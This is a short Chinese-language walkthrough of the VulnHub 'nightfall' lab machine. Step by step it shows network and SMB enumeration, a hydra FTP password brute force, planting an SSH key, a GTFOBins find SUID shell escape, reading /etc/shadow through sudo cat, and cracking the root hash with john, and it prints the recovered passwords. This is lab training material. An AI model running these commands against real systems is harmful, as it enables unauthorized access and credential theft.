vulnhub之nightfall的实践

admin 2023年12月4日11:21:23评论13 views字数 1085阅读3分37秒阅读模式

今天实践的是vulnhub的nightfall镜像,

下载地址,https://download.vulnhub.com/sunset/nightfall.zip,

用virtualbox导入成功,

做地址扫描,sudo netdiscover -r 192.168.0.0/24,

获取到靶机地址192.168.0.180,

vulnhub之nightfall的实践

继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.180,

获取到靶机有21端口的ftp服务,22端口的ssh服务,139/445端口的smb服务,

vulnhub之nightfall的实践

对smb服务进行扫描,enum4linux 192.168.0.180,

获取到用户名,nightfall和matt

vulnhub之nightfall的实践

对matt用户进行ftp暴破,

hydra -l matt -P /usr/share/wordlists/rockyou.txt 192.168.0.180 ftp,

获取到matt/cheese,

vulnhub之nightfall的实践

ftp登录,ftp 192.168.0.180,发现当前是home目录,而且可写,

vulnhub之nightfall的实践

kali攻击机上制作密钥对儿,ssh-keygen,

vulnhub之nightfall的实践

公钥保存到文件,vim authorized_keys,

ftp上创建ssh目录,mkdir .ssh,上传公钥文件,

vulnhub之nightfall的实践

ssh登录,ssh [email protected],id确认不是root,

vulnhub之nightfall的实践

查找sudo权限的程序,find / -perm -u=s -type f 2>/dev/null,

获取到/scripts/find,去GTFOBINS上查找方法,

获取到./find . -exec /bin/sh -p ; -quit,

vulnhub之nightfall的实践

进入目录cd /scripts,执行,获取到新的shell,id确认是nightfall,

vulnhub之nightfall的实践

继续重复上传公钥的方法,kali攻击机上开个http下载服务,

python2 -m SimpleHTTPServer,

进入home目录,cd /home/nightfall,创建ssh目录,mkdir .ssh,

下载公钥文件,wget http://192.168.0.192:8000/authorized_keys,

vulnhub之nightfall的实践

重新ssh登录,ssh [email protected]

查看root权限程序,sudo -l,获取到/usr/bin/cat,

查看密码文件,sudo -u root cat /etc/shadow,

获取到root的密码hash,

vulnhub之nightfall的实践

保存到文件,vim hash,暴破,john hash,获取到root/miguel2,

vulnhub之nightfall的实践

切换到root,su root,id确认OK,

vulnhub之nightfall的实践


原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之nightfall的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月4日11:21:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之nightfall的实践https://cn-sec.com/archives/2265971.html

发表评论

匿名网友 填写信息